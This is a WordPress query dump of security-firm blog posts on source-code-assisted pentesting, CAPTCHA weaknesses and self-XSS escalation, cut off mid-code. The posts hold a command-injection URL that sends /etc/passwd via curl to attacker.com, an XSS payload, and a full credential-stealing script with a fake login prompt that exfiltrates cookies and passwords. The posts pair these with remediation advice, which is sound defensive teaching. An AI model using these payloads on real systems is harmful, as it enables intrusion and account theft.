Hans Petrich

WP_Query Object

(

[query] => Array

(

[post_type] => Array

(

[0] => post

[1] => webinars

)

[posts_per_page] => -1

[post_status] => publish

[meta_query] => Array

(

[relation] => OR

[0] => Array

(

[key] => new_authors

[value] => "94"

[compare] => LIKE

)

[1] => Array

(

[key] => new_presenters

[value] => "94"

[compare] => LIKE

)

)

)

[query_vars] => Array

(

[post_type] => Array

(

[0] => post

[1] => webinars

)

[posts_per_page] => -1

[post_status] => publish

[meta_query] => Array

(

[relation] => OR

[0] => Array

(

[key] => new_authors

[value] => "94"

[compare] => LIKE

)

[1] => Array

(

[key] => new_presenters

[value] => "94"

[compare] => LIKE

)

)

[error] =>

[m] =>

[p] => 0

[post_parent] =>

[subpost] =>

[subpost_id] =>

[attachment] =>

[attachment_id] => 0

[name] =>

[pagename] =>

[page_id] => 0

[second] =>

[minute] =>

[hour] =>

[day] => 0

[monthnum] => 0

[year] => 0

[w] => 0

[category_name] =>

[tag] =>

[cat] =>

[tag_id] =>

[author] =>

[author_name] =>

[feed] =>

[tb] =>

[paged] => 0

[meta_key] =>

[meta_value] =>

[preview] =>

[s] =>

[sentence] =>

[title] =>

[fields] =>

[menu_order] =>

[embed] =>

[category__in] => Array

(

)

[category__not_in] => Array

(

)

[category__and] => Array

(

)

[post__in] => Array

(

)

[post__not_in] => Array

(

)

[post_name__in] => Array

(

)

[tag__in] => Array

(

)

[tag__not_in] => Array

(

)

[tag__and] => Array

(

)

[tag_slug__in] => Array

(

)

[tag_slug__and] => Array

(

)

[post_parent__in] => Array

(

)

[post_parent__not_in] => Array

(

)

[author__in] => Array

(

)

[author__not_in] => Array

(

)

[search_columns] => Array

(

)

[ignore_sticky_posts] =>

[suppress_filters] =>

[cache_results] => 1

[update_post_term_cache] => 1

[update_menu_item_cache] =>

[lazy_load_term_meta] => 1

[update_post_meta_cache] => 1

[nopaging] => 1

[comments_per_page] => 50

[no_found_rows] =>

[order] => DESC

)

[tax_query] => WP_Tax_Query Object

(

[queries] => Array

(

)

[relation] => AND

[table_aliases:protected] => Array

(

)

[queried_terms] => Array

(

)

[primary_table] => wp_posts

[primary_id_column] => ID

)

[meta_query] => WP_Meta_Query Object

(

[queries] => Array

(

[0] => Array

(

[key] => new_authors

[value] => "94"

[compare] => LIKE

)

[1] => Array

(

[key] => new_presenters

[value] => "94"

[compare] => LIKE

)

[relation] => OR

)

[relation] => OR

[meta_table] => wp_postmeta

[meta_id_column] => post_id

[primary_table] => wp_posts

[primary_id_column] => ID

[table_aliases:protected] => Array

(

[0] => wp_postmeta

)

[clauses:protected] => Array

(

[wp_postmeta] => Array

(

[key] => new_authors

[value] => "94"

[compare] => LIKE

[compare_key] => =

[alias] => wp_postmeta

[cast] => CHAR

)

[wp_postmeta-1] => Array

(

[key] => new_presenters

[value] => "94"

[compare] => LIKE

[compare_key] => =

[alias] => wp_postmeta

[cast] => CHAR

)

)

[has_or_relation:protected] => 1

)

[date_query] =>

[request] => SELECT wp_posts.ID

FROM wp_posts INNER JOIN wp_postmeta ON ( wp_posts.ID = wp_postmeta.post_id )

WHERE 1=1 AND (

( wp_postmeta.meta_key = 'new_authors' AND wp_postmeta.meta_value LIKE '%\"94\"%' )

OR

( wp_postmeta.meta_key = 'new_presenters' AND wp_postmeta.meta_value LIKE '%\"94\"%' )

) AND wp_posts.post_type IN ('post', 'webinars') AND ((wp_posts.post_status = 'publish'))

GROUP BY wp_posts.ID

ORDER BY wp_posts.post_date DESC

[posts] => Array

(

[0] => WP_Post Object

(

[ID] => 26378

[post_author] => 94

[post_date] => 2021-09-14 07:00:00

[post_date_gmt] => 2021-09-14 12:00:00

[post_content] =>

In almost every industry, client-provider relationships look for win-win scenarios. For some, a win-win is as simple as a provider getting paid and the client getting value out of the money they paid for the service or product. While delivering high-quality services is certainly a big win, there are many opportunities in the pentesting space to win even bigger from the perspective of both the client and the provider. Enter: source code assisted penetration testing.

Here's the TL;DR of this article in a quick bullet list:

5 reasons you should consider a source code assisted pentest:

- More thorough results

- More comprehensive testing

- More vulnerabilities discovered

- No added cost

- Much more specific remediation guidance for identified vulnerabilities

Not convinced? Let’s take a deeper dive into why you should choose a source code assisted pentest over a black-box or grey-box pentest.

Cost

We should probably get this out of the way first. To make a long story short, there’s no extra cost to do source code assisted penetration testing with NetSPI. This is a huge win, but it is by no means the only benefit of a source code assisted pentest. We’ll discuss the benefits in greater detail below.

Black-box vs. grey-box vs. white-box penetration testing

Penetration testing is typically performed from a grey-box or black-box perspective. Let’s define some of these terms:

Black-box: This means that the assessment is performed from the perspective of a typical attacker on the internet. No special access, documentation, source code, or inside knowledge is provided to the pentester in this type of engagement. This type of assessment emulates a real-world attacker scenario.

Grey-box: This means that the assessment is performed with limited knowledge of the inner workings of the application (usually given to the tester through a demo of the application). Testers are typically granted non-public access to the application in the form of user or admin accounts for use in the testing process. Grey-box is the typical perspective of most traditional pentests.

White-box: This is where source code assisted pentests live. This type of assessment includes everything that a grey-box one would have but adds onto it by providing access to the application’s source code. This type of engagement is far more collaborative. The pentester often works with the application architects and developers to gain a better understanding of the application’s inner workings.

Many clients come into a pentest wanting a black-box test of their application. This seems very reasonable from their point of view, because what they're ultimately concerned about is the real-world attacker scenario. They don’t expect an attacker to have access to administrative accounts, or even customer accounts. They also don’t expect an attacker to have access to their internal application documentation, and certainly not to the source code. These are all reasonable assumptions, but let’s discuss why they are misleading.

Never assume your user or admin accounts are inaccessible to an attacker

If you want an in-depth discussion on how attackers gain authenticated access to an application, go read this article on our technical blog, Login Portal Security 101. In summary, an attacker will almost always be able to get authenticated access into your application as a normal user. At the very least, they can usually go the legitimate route of becoming a customer to get an account created, but typically this isn’t even necessary.

Once the authentication boundary has been passed, authorization bypasses and privilege escalation vulnerabilities are exceedingly common findings, even in the most modern applications. Here’s one example (of many) of how an attacker can go from normal user to site admin: Insecurity Through Obscurity.

Never assume that your source code is inaccessible to an attacker

We’ve encouraged clients to choose source code assisted pentesting for some time now, but there are many reasons why organizations are hesitant to give out access to their source code. Most of these concerns are for the safety and privacy of their codebase, which contains highly valuable intellectual property. These are valid concerns, and it’s understandable to wait until you’ve established a relationship of trust before handing over your crown jewels. In fact, I recommend this approach if you’re dealing with a company whose reputation and integrity you cannot verify. However, let me demonstrate why source code assisted pentests are so valuable by telling you about one of our recent pentests:

Customer A did not provide source code for an assessment we performed. During the engagement, we identified a page that allowed file uploads. We spent some time testing how well they had protected against uploading potentially harmful files, such as .aspx, .php, .html, etc. This endpoint appeared to have a decent whitelist of allowed files and wouldn’t accept any malicious file uploads that we attempted. The endpoint did allow us to specify certain directories where files could be stored (instead of the default locations) but was preventing uploads to many other locations. Without access to the source code handling these file uploads, we spent several hours working through different tests to see what we could upload, and to where. We were suspicious that there was a more significant vulnerability within this endpoint, but eventually moved on to testing other aspects of the application given the time constraints of a pentest.

A few days later, we discovered another vulnerability that allowed us to download arbitrary files from the server. Due to another directory traversal issue, we were finally able to exfiltrate the source code that handled the file upload we had been testing previously. With access to the source, we quickly saw that they had an exception to their restricted files list when uploading files to a particular directory. Using this “inside knowledge” we were able to upload a webshell to the server and gain full access to the web server. This webshell access allowed us to… you guessed it… view all their source code stored on the web server. We immediately reported the issue to the client and asked whether we could access the rest of the source code stored on the server. The client agreed, and we discovered several more vulnerabilities within the source that could have been missed if we had continued in our initial grey-box approach.
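The flaw described above, an upload filter that waved through any file type for one particular directory, can be illustrated with a short sketch. The Python below is hypothetical: the directory names, the `ALLOWED_EXTENSIONS` set and both function names are illustrative and not taken from the client's code. The vulnerable version skips the extension check for a special directory; the safer version applies one allowlist everywhere, only accepts known target directories, and rejects file names that carry path components.

```python
from pathlib import PurePosixPath

# Hypothetical allowlist and upload directories, for illustration only
ALLOWED_EXTENSIONS = {".png", ".jpg", ".pdf"}
ALLOWED_DIRS = {"uploads", "uploads/avatars", "uploads/docs"}
EXCEPTION_DIR = "uploads/docs"  # the directory that was given a special exception


def is_allowed_vulnerable(filename: str, directory: str) -> bool:
    """Mimics the flaw: the extension check is skipped for one directory."""
    if directory == EXCEPTION_DIR:
        return True  # exception to the restricted-files list
    return PurePosixPath(filename).suffix.lower() in ALLOWED_EXTENSIONS


def is_allowed_fixed(filename: str, directory: str) -> bool:
    """Applies the same allowlist everywhere and only accepts known directories."""
    name = PurePosixPath(filename)
    # Reject names with path components, e.g. "../shell.aspx" or "..\shell.aspx"
    if "\\" in filename or name.name != filename:
        return False
    if directory not in ALLOWED_DIRS:
        return False
    return name.suffix.lower() in ALLOWED_EXTENSIONS


print(is_allowed_vulnerable("shell.aspx", "uploads/docs"))  # True
print(is_allowed_fixed("shell.aspx", "uploads/docs"))       # False
```

The design choice here is to fail closed: anything not explicitly listed, whether an extension or a directory, is rejected.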

Attackers are not bound by time limits, but pentesters are

The nature of pentesting requires that we only spend a predetermined amount of time pentesting a particular application. The story above illustrates how much valuable time is lost when pentesters have to guess what is happening on the server-side. Prior to having the source code, we spent several hours going through trial and error in an attempt to exploit a likely vulnerability. Even after all that time, we didn’t discover any particularly risky exploit and could have passed this over as something that ultimately wasn’t vulnerable. However, with a 5-minute look at the code, we immediately understood what the vulnerability was, and how to exploit it.

The time savings alone is a huge win for both parties. Saving several hours of guesswork during an assessment that lasts only 40 hours is extremely significant. You might be saying, “but if you couldn’t find it, that means it’s unlikely someone else would find it… right?” True, but “unlikely” does not mean “impossible.” Would you rather leave a vulnerability in an application when it could be removed?

Let’s illustrate this point with an example of a successful source code assisted penetration test. During a source code assisted pentest, we discovered an endpoint that did not show up in our scans, spiders, or browsing of the application. By looking through the source code, we discovered that the endpoint could still be accessed if explicitly browsed to and determined the structure of the request accepted by this “hidden” endpoint.







The controller took a “start_date” and “end_date” from the URL and then passed those variables into another function that used them in a very unsafe manner:





This PHP file used the unfiltered, unmodified, unsanitized parameters directly in a string that was passed to a “shell_exec()” function call. shell_exec() runs its argument through the system shell, so this resulted in command injection on the server. As a proof of concept, we made the following request to the server and were able to exfiltrate the contents of /etc/passwd to an external server: https://redacted.com/redacted/vulnpath?start_date=2017-07-16|echo%20%22cmd=cat%20/etc/passwd%22%20|%20curl%20-d%20@-%20https%3a%2f%2fattacker.com%2flog%20%26

In layman’s terms: An attacker is essentially able to run any code they want on the server with this vulnerability, which could lead to full host or even network compromise.
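The root cause is that the shell, not the application, decides where one command ends and the next begins. The Python sketch below reproduces the pattern in a harmless form: `echo report` stands in for the real script (the actual command isn't shown in the post), `run_report_unsafe` is a hypothetical name, and the injected value uses `;` rather than the `|` from the proof of concept above. It assumes a POSIX shell at `/bin/sh`.

```python
import subprocess


def run_report_unsafe(start_date: str, end_date: str) -> str:
    # Vulnerable pattern: user input is pasted into a command string that is
    # handed to the shell, just as the PHP code did with shell_exec().
    command = f"echo report {start_date} {end_date}"
    result = subprocess.run(command, shell=True, capture_output=True, text=True)
    return result.stdout


# A normal request produces one line of output...
print(run_report_unsafe("2017-07-16", "2017-07-31"))
# ...but a crafted start_date makes the shell run a second command.
print(run_report_unsafe("2017-07-16; echo INJECTED", "2017-07-31"))
```

Any shell metacharacter (`;`, `|`, `&`, backticks, `$(...)`) in the parameter has the same effect, which is why the fix has to stop the value from ever being parsed as shell syntax.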

With a vulnerability this significant, you should be wondering why this endpoint never showed up in any of our black-box or grey-box testing. The answer is that this particular endpoint was only supposed to be used by a subset of the client’s customers, and the test accounts we were given did not have the flag that displays it. Had this been a pentest without access to source code, the endpoint would almost certainly have been missed, and the command injection vulnerability would still be exposed to every customer account that could see it. After fixing this vulnerability, the client confirmed that no one had exploited it and breathed a huge sigh of relief.

On the other hand, the client in our first example had a far different outcome. Even though the company immediately fixed the vulnerability in the latest version of the product, they failed to patch previously deployed instances and those instances were hacked months later. A key portion of the hacker’s exploit chain was the file upload vulnerability we had identified using the source code.

Had we not discovered the vulnerability and disclosed it to them, the hack would have been much worse. Perhaps the attackers used the same methodology we did to exploit the vulnerability, but it’s just as likely that they found another way to build a working exploit against that file upload. This is a perfect example of why source code assisted pentests should be your go-to solution when performing a pentest. We discovered the vulnerability months before they were hacked because we had access to the source code. Had they properly mitigated the vulnerability in every deployed instance, they could potentially have avoided an exceptionally costly hack.

Specific Remediation Guidance

To close out this post, I want to highlight how much more specific the remediation guidance can be when we’re performing a source code assisted pentest as opposed to one without source code. Here’s an example of the remediation guidance given to a client with the vulnerable PHP script:

Use escapeshellarg() to prevent user-supplied input from being interpreted as additional shell commands or arguments. Specifically, change line 47 to this:

$output = shell_exec(escapeshellarg($scriptOgcJs));

Additionally, the startDate and endDate parameters should be validated as real dates on line 26 of the examplecontroller.php page. We recommend using PHP’s checkdate() function as a whitelist measure so that nothing other than a well-formatted date can reach sensitive functions. Reference: https://www.php.net/manual/en/function.checkdate.php
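For readers working in Python rather than PHP, a rough equivalent of that guidance is sketched below. `datetime.strptime` plays the role of `checkdate()` as a whitelist on the date format, and the command is passed to `subprocess.run` as a list so that no shell parses it at all. Where a shell genuinely is required, `shlex.quote` is the closest counterpart to `escapeshellarg()`; in this sketch it is applied to each user-supplied value rather than to the assembled command. The `echo report` command, the `YYYY-MM-DD` format and the function names are assumptions for illustration.

```python
import shlex
import subprocess
from datetime import datetime


def validate_date(value: str) -> str:
    """Whitelist check: accept only real calendar dates in YYYY-MM-DD form."""
    # strptime raises ValueError for malformed input, trailing junk,
    # or impossible dates such as 2017-02-30
    datetime.strptime(value, "%Y-%m-%d")
    return value


def run_report_safe(start_date: str, end_date: str) -> str:
    start = validate_date(start_date)
    end = validate_date(end_date)
    # No shell involved: each list element reaches the program as one argument
    result = subprocess.run(["echo", "report", start, end],
                            capture_output=True, text=True, check=True)
    return result.stdout


def build_shell_command(start_date: str, end_date: str) -> str:
    # If a shell string is unavoidable, quote every user-supplied value individually
    return f"echo report {shlex.quote(start_date)} {shlex.quote(end_date)}"
```

Validation and quoting are layered on purpose: the date check rejects `2017-07-16; echo INJECTED` outright, and the list-form call means that even a value that slipped past validation would be passed as data, never as shell syntax.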

Without access to the source code, we are only able to give generic guidance for remediation steps. With the source code, we can recommend specific fixes that should help your developers more successfully remediate the identified vulnerabilities.

[post_title] => Why You Should Consider a Source Code Assisted Penetration Test [post_excerpt] => Learn how to increase the value and results of your penetration testing with a source code assisted pentest. [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => consider-a-source-code-assisted-pentest [to_ping] => [pinged] => [post_modified] => 2022-12-16 10:51:51 [post_modified_gmt] => 2022-12-16 16:51:51 [post_content_filtered] => [post_parent] => 0 [guid] => https://www.netspi.com/?p=26378 [menu_order] => 365 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [1] => WP_Post Object ( [ID] => 25051 [post_author] => 94 [post_date] => 2018-03-09 09:40:00 [post_date_gmt] => 2018-03-09 09:40:00 [post_content] =>Web app assessments are probably among the most popular penetration tests performed today. They are so popular that public bug bounty platforms such as HackerOne and Bugcrowd offer hundreds of programs for companies wanting to fix vulnerabilities such as XSS, SQL injection, CSRF, etc. Many companies also host their own bounty programs for reporting web vulnerabilities to a security team. Follow along with our 4-part mini-series of blog posts about web security:



CAPTCHAs (Completely Automated Public Turing test to tell Computers and Humans Apart) are an anti-automation control that is becoming increasingly important for protecting forms from automated submissions. However, just because you have a CAPTCHA on your form does not mean that you “did it right”. Let’s review some of the important points to check when implementing a CAPTCHA:

Check #1: Can it be re-used?

Here’s an example we recently ran into:

Everything looks good, right? The application would not allow a user to log in without solving the CAPTCHA, and the CAPTCHA was difficult for a computer to guess but relatively easy for a human to solve. Here’s a sample login POST body as captured in Burp’s Proxy:

You can see that the user’s username and password are being sent along with the CAPTCHA’s “hash” and the CAPTCHA’s solution. If the CAPTCHA’s “hash” is stored in the back-end database as a one-time-use entry that gets deleted when the user submits this login request, everything should be fine. To test this, all we need to do is replay the request to the server. If the server accepts the replayed CAPTCHA submission, then we know we can reuse that CAPTCHA submission to brute-force a user’s login credentials.



(Burp Intruder was used to replay the login POST request while changing the submitted password. The user’s password was successfully guessed on the 86th try even though we were replaying the same CAPTCHA on each request.)

In the end, this login portal’s CAPTCHA wasn’t protecting users from anything; it only made the login process more cumbersome. Each user was inconvenienced by the need to solve the CAPTCHA, but an attacker could bypass it by solving it once and then replaying it many times. Along with storing each CAPTCHA as a one-time-use database entry, the application could tie the CAPTCHA’s ID to the user’s current session cookie and, on each request that requires a CAPTCHA, look up the user’s session to determine which CAPTCHA the user is supposed to solve. If the request is submitted without a session cookie, or the same CAPTCHA ID is replayed, the request should automatically fail.
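The countermeasures in the previous paragraph (one-time-use CAPTCHA entries, bound to the user's session, failing automatically on replay or a missing session) fit in a few lines. This is a hypothetical in-memory Python sketch: `CaptchaStore` and its methods are illustrative names, the case-insensitive answer check is an assumption, and a real application would keep this state in its session or database layer and add an expiry.

```python
import secrets
from typing import Dict, Optional, Tuple


class CaptchaStore:
    """Hypothetical server-side store holding one outstanding CAPTCHA per session."""

    def __init__(self) -> None:
        # session_id -> (captcha_id, expected answer)
        self._pending: Dict[str, Tuple[str, str]] = {}

    def issue(self, session_id: str, answer: str) -> str:
        """Record a new CAPTCHA for this session, replacing any earlier one."""
        captcha_id = secrets.token_urlsafe(16)
        self._pending[session_id] = (captcha_id, answer)
        return captcha_id

    def verify(self, session_id: Optional[str], captcha_id: str, solution: str) -> bool:
        if not session_id:
            return False  # no session cookie: fail automatically
        # pop() makes each CAPTCHA single-use, whether or not the answer is correct
        entry = self._pending.pop(session_id, None)
        if entry is None:
            return False  # already used (a replay) or never issued
        expected_id, answer = entry
        return expected_id == captcha_id and answer.lower() == solution.lower()
```

Because `verify` removes the entry before comparing the answer, a wrong guess also burns the CAPTCHA, so a Burp Intruder run that replays one solved CAPTCHA would fail from the second request onward.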

Check #2: Do I need to solve it?

Here’s another example of a failed CAPTCHA implementation on an account registration page:



What can we notice from this example? The new account registration page has implemented a CAPTCHA, but the form checks the new account’s email address as soon as the attacker enters it into the form… no CAPTCHA solving required. An attacker can use this unprotected functionality to brute-force the discovery of email addresses that have already been registered on the site. This particular application used the email address as the username in its login requests (and also had a weak password policy), so we were able to log in to over a dozen separate accounts by trying a common password against the discovered email addresses.

Check #3: Is it difficult for a computer to solve?

Here are some sample CAPTCHAs taken from a recent assessment:



What sticks out about these CAPTCHAs? They seem to use some sort of predefined template for letter placement (letters are always in the same spot), always contain 8 characters, and only use letters of the English alphabet (26 possibilities). OCR programs don’t do very well at character analysis on these CAPTCHAs, but after a few simple transformations, here are some results we were able to obtain:

OCR still didn’t perform very well on these transformed CAPTCHAs (less than a 2% match rate using Google’s Tesseract library), but there is another option open to a determined attacker: solve the letters in each position once and store them in a database for solving future CAPTCHAs. A simple program can show the attacker the letter in a particular position and store each letter/position combination in a database to be matched against all subsequent CAPTCHAs. This requires the attacker to manually input 26 × 8 = 208 letter/position combinations, but afterwards the computer can use the stored information to solve a majority of the CAPTCHAs this application can produce.

Solving 208 separate character positions didn’t take more than a few minutes (although writing the code to do it took a few hours), so the payoff to an attacker would only be worth it if the CAPTCHA’d request were of high value.
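The position-by-position lookup described above amounts to a small nearest-neighbour classifier with one labelled sample per (position, letter) pair, 26 × 8 = 208 in total. The sketch below assumes each character slot has already been cropped from the fixed template and reduced to a tuple of 0/1 pixels; the cropping step, the `Glyph` representation and the Hamming-distance matching are illustrative assumptions, not the script used in the assessment.

```python
from typing import Dict, List, Tuple

Glyph = Tuple[int, ...]  # hypothetical: one cropped character slot as 0/1 pixels
# position -> list of (sample glyph, letter), filled in by a human labelling each slot once
LabelledSamples = Dict[int, List[Tuple[Glyph, str]]]


def hamming(a: Glyph, b: Glyph) -> int:
    """Number of pixels that differ between two equally sized glyphs."""
    return sum(x != y for x, y in zip(a, b))


def add_sample(db: LabelledSamples, position: int, glyph: Glyph, letter: str) -> None:
    db.setdefault(position, []).append((glyph, letter))


def solve(db: LabelledSamples, glyphs: List[Glyph]) -> str:
    """For each position, pick the stored letter whose sample is closest."""
    answer = []
    for position, glyph in enumerate(glyphs):
        _, letter = min(db[position], key=lambda sample: hamming(sample[0], glyph))
        answer.append(letter)
    return "".join(answer)
```

Matching on the closest stored sample rather than an exact match is what lets noisy renderings still resolve to a letter, which is also why such a solver ends up with a success rate below 100%.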

Overall, the script was able to solve these CAPTCHAs with 70% accuracy. Here are some example results:

Most attackers wouldn’t spend the time required to solve this type of CAPTCHA unless it was protecting something fairly sensitive. Of the three bad examples we’ve shown, this one was the best, because the application DID require the CAPTCHA to be solved on each submission and did NOT accept replayed CAPTCHA requests. This type of CAPTCHA provides “good enough” protection by adding an extra layer of complexity that prevents automated submissions by bots.

Another Transformation Example

Even though the CAPTCHAs from our first example had a flaw which made it unnecessary to solve them by OCR, here’s an example of how the CAPTCHAs could be transformed to make them easier to identify in an automated attack:

Original Image

Transformed Image

Here’s the relevant python code used to transform the second set of CAPTCHAs:

import numpy as np
from PIL import Image

def change_to_white(data, r, g, b):
    # Uses the module-level red/green/blue band views defined below
    target_color = (red == r) & (blue == b) & (green == g)
    data[..., :-1][target_color.T] = (255, 255, 255)  # Set RGB of matching pixels to white, keep alpha
    return data

im = Image.open(startimagepath)  # startimagepath / imagepath: input and output file paths
im = im.convert('RGBA')
data = np.array(im)  # "data" is a height x width x 4 numpy array
red, green, blue, alpha = data.T  # Temporarily unpack the bands for readability

colors = []
for x in range(0, len(red[0])):  # Cycle through the numpy array and store individual color combinations
    for i in range(0, len(red)):
        color = (red[i][x], green[i][x], blue[i][x])
        colors.append(color)
unique_colors = set(colors)  # Grab out the unique colors from the image

# Cycle through the unique colors in the image and replace all "light" colors with white
for u in unique_colors:
    # Consider a color "light" if the sum of its red, green, and blue values is greater than 220
    # (cast to int first so the uint8 values don't overflow and wrap around past 255)
    if sum(int(c) for c in u) > 220:
        data = change_to_white(data, u[0], u[1], u[2])

# save the new image
im2 = Image.fromarray(data)
im2.save(imagepath)
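The per-pixel loop and per-color mask above can also be collapsed into a single NumPy operation, which is much faster on larger images. The sketch below keeps the script's rule (a color is "light" when its red, green and blue values sum to more than 220; light pixels become white and alpha is kept) but works on an in-memory array, so the file paths are left out; `whiten_light_pixels` is an illustrative name.

```python
import numpy as np


def whiten_light_pixels(data: np.ndarray, threshold: int = 220) -> np.ndarray:
    """Return a copy of an RGBA array with every 'light' pixel set to white."""
    out = data.copy()
    # Sum RGB as int32 to avoid uint8 overflow (200 + 200 would otherwise wrap)
    light = out[..., :3].astype(np.int32).sum(axis=-1) > threshold
    out[light, :3] = 255  # the alpha channel is left untouched
    return out


# Usage with Pillow, mirroring the script above:
#   im = Image.open(startimagepath).convert("RGBA")
#   Image.fromarray(whiten_light_pixels(np.array(im))).save(imagepath)
```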

Google Solves their own reCAPTCHAs

While Google has since made improvements to reCAPTCHA, there was a proof-of-concept GitHub project that used Google’s Speech Recognition service to solve the audio portion of their reCAPTCHAs. Project info can be found here: https://github.com/ecthros/uncaptcha

Wrap-Up

Web application vulnerabilities continue to be a significant risk to organizations. Silent Break Security understands the offensive and defensive mindset of security, and can help your organization better prevent, detect, and defend against attackers through more sophisticated testing and collaborative remediation.

[post_title] => CAPTCHAs Done Right? [post_excerpt] => [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => captchas-done-right [to_ping] => [pinged] => [post_modified] => 2021-04-27 14:25:29 [post_modified_gmt] => 2021-04-27 14:25:29 [post_content_filtered] => [post_parent] => 0 [guid] => https://www.netspi.com/?p=25051 [menu_order] => 607 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [2] => WP_Post Object ( [ID] => 25082 [post_author] => 94 [post_date] => 2018-02-12 10:44:00 [post_date_gmt] => 2018-02-12 10:44:00 [post_content] =>Maybe you’re a web app pentester who gets frustrated with finding self-xss on sites you test, or maybe you’re a website owner who keeps rejecting self-xss as a valid vulnerability. This post is intended to help both groups understand the risk involved in self-xss and how it can be used against other users.

So what is self-xss?



self-xss is a form of cross-site scripting (xss) that appears to only function on the user’s account itself and typically requires the user to insert the JavaScript into their own account. This isn’t all that useful to an attacker since the goal is to get the xss to execute on other users of the application. A classic example of self-xss is having an xss vulnerability on the user’s account profile page that can only be viewed by the user. Here’s an example of a user inserting JavaScript into their own account name:

The user sets the value of the ‘name’ field to "><script>alert(1)</script> in order to break out of the initial <input> tag and insert the desired JavaScript into the page. Notice that the resulting page source contains our inserted script tags and the JavaScript executes when the user’s account profile is loaded. Okay, so who will this ‘malicious’ JavaScript affect? If the application allows users to see other users’ names, then this would be a nice attack vector, but what if it doesn’t? Who’s going to see the infected username and “get popped” by our malicious JavaScript payload other than ourselves? Below, we’ll discuss several ways that self-xss can be transformed into traditional xss.
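The breakout works because the stored name is written into the input's `value` attribute without HTML encoding, so the leading `">` closes both the attribute and the tag. A minimal Python sketch of the difference, using the standard library's `html.escape`; the `render_name_field` helper and its markup are hypothetical stand-ins for the profile page template:

```python
import html


def render_name_field(name: str, escape: bool = True) -> str:
    # Hypothetical profile template: the stored name goes into an input's value attribute
    value = html.escape(name, quote=True) if escape else name
    return f'<input type="text" name="name" value="{value}">'


payload = '"><script>alert(1)</script>'
print(render_name_field(payload, escape=False))
# <input type="text" name="name" value=""><script>alert(1)</script>">
print(render_name_field(payload))
# <input type="text" name="name" value="&quot;&gt;&lt;script&gt;alert(1)&lt;/script&gt;">
```

With `quote=True`, the double quote becomes `&quot;`, so the payload stays inside the attribute as inert text.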

Executing on privileged user accounts

Most web applications have tiered permissions on their user accounts. If the self-xss injection point resides in a “normal” user’s account, an administrative user will likely be able to view that account’s details. We’ve seen this occur on many assessments where we are given access to both a normal user account and an administrative user account: by injecting a self-xss payload into the normal user’s account, then viewing that user’s account with the admin account, the xss is successfully executed in the context of the admin account. Well, what if you don’t have access to an admin account to verify this behavior manually? You can set up an external logging server and inject a payload that calls out to it. By periodically checking the external server’s logs, you can verify whether or not the payload has been executed by another user.

Here’s a simple example of a php logging page on an external server (ex: https://yourdomain.com/log):

<?php
// Use htmlspecialchars() to prevent persistent xss on your own log pages :)
$req_dump = htmlspecialchars(print_r($_REQUEST, TRUE), ENT_QUOTES, 'UTF-8');
$headers = apache_request_headers();
// fopen() in append mode creates request.log in the current directory if it doesn't exist
// (the directory must be writable by the web server)
$fp = fopen('request.log', 'a');
$req_dump .= " - ";
$req_dump .= date("Y-m-d H:i:s");
$req_dump .= "<br>";
foreach ($headers as $header => $value) {
    // Escape headers too: they are attacker-controlled and end up in the same HTML log
    fwrite($fp, htmlspecialchars("$header: $value", ENT_QUOTES, 'UTF-8') . " <br />\n");
}
fwrite($fp, "<br />\n");
fwrite($fp, $req_dump);
fwrite($fp, "<br />\n");
fclose($fp);
echo "success";

Instead of inserting "><script>alert(1)</script> into the username, you would submit something like: "><script src='https://yourdomain.com/js/stealcreds.js'>



The following JavaScript would be placed in the stealcreds.js file referenced in the xss. It immediately performs a “check-in” call if the script successfully loads, which sends the user’s cookies and the URL where the xss was executed. The script then inserts an invisible login prompt into the page, then waits for the browser to auto-fill the user’s saved credentials. If the script detects that the form has been auto-filled by the browser, then the user’s credentials are also sent to the logging server:

var done = false;
var stolen = false;

function makeit(){
    setTimeout(function(){
        var myElem = document.getElementById("loginmodal");
        if (myElem === null){
            document.body.innerHTML += '<a style="display:none" >Modal Login</a><div id="loginmodal" style="display:none;"><h1>User Login</h1>' +
                '<form id="loginform" name="loginform" method="post"><h2 style="color:red">Your session has timed out, ' +
                'please re-enter your credentials</h2><label for="username">Username:</label><input type="text" ' +
                'name="username" id="username" class="txtfield" tabindex="1"><label for="password">Password:</label>' +
                '<input type="password" name="password" id="password" class="txtfield" tabindex="2"><div class="center">' +
                '<input type="submit" name="loginbtn" id="loginbtn" class="flatbtn-blu hidemodal" value="Log In" tabindex="3">' +
                '</div></form></div>';
            XSSImage = new Image;
            XSSImage.src="https://yourdomain.com/log?checkin=true&cookies=" + encodeURIComponent(document.cookie) + "&url=" + window.location.href;
        }
    }, 2000);
}

makeit();

function defer_again(method) {
    var myElem = document.getElementById("loginmodal");
    if (myElem === null)
        setTimeout(function() { defer_again(method) }, 50);
    else{
        method();
    }
}

defer_again(
    function trig(){
        var uname = document.getElementById('username').value;
        var pwd = document.getElementById('password').value;
        if (uname.length > 4 && pwd.length > 4)
        {
            done = true;
            //alert("Had this been a real attack... Your credentials were just stolen. User Name = " + uname + " Password = " + pwd);
            XSSImage = new Image;
            XSSImage.src="https://yourdomain.com/log?username=" + encodeURIComponent(uname) + "&password=" + encodeURIComponent(pwd) +
                "&url=" + window.location.href;
            stolen = true;
            return false;
        }
        if(!stolen){
            document.getElementById('username').focus();
            setTimeout(function() { trig() }, 50);
        }
    }
);

The resulting log entries will look something like this if the browser auto-fills the user’s credentials in our invisible login form:

Cross-Site Request Forgery (CSRF)

If you’re not familiar with CSRF, then here’s OWASP’s definition:

Cross-Site Request Forgery (CSRF) is an attack that forces an end user to execute unwanted actions on a web application in which they’re currently authenticated. CSRF attacks specifically target state-changing requests, not theft of data, since the attacker has no way to see the response to the forged request. With a little help of social engineering (such as sending a link via email or chat), an attacker may trick the users of a web application into executing actions of the attacker’s choosing. If the victim is a normal user, a successful CSRF attack can force the user to perform state changing requests like transferring funds, changing their email address, and so forth. If the victim is an administrative account, CSRF can compromise the entire web application.

The short of it is this: if the affected website is vulnerable to CSRF, then self-xss becomes regular xss. If I can convince a user to visit my website, and my website then makes a POST request to the affected website that changes the user’s name to "><script src='https://yourdomain.com/js/stealcreds.js'>, my work is done: self-xss has successfully been converted to regular xss.
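The attack above only works if the name-change endpoint accepts a POST that carries the victim's cookies but nothing the attacker cannot know. A common defence is a per-session synchronizer token, sketched below in Python with hypothetical names (`issue_csrf_token`, `handle_name_change`, and a plain dict standing in for the server-side session). A cross-site page cannot read the token, so its forged request is rejected.

```python
import hmac
import secrets
from typing import Dict


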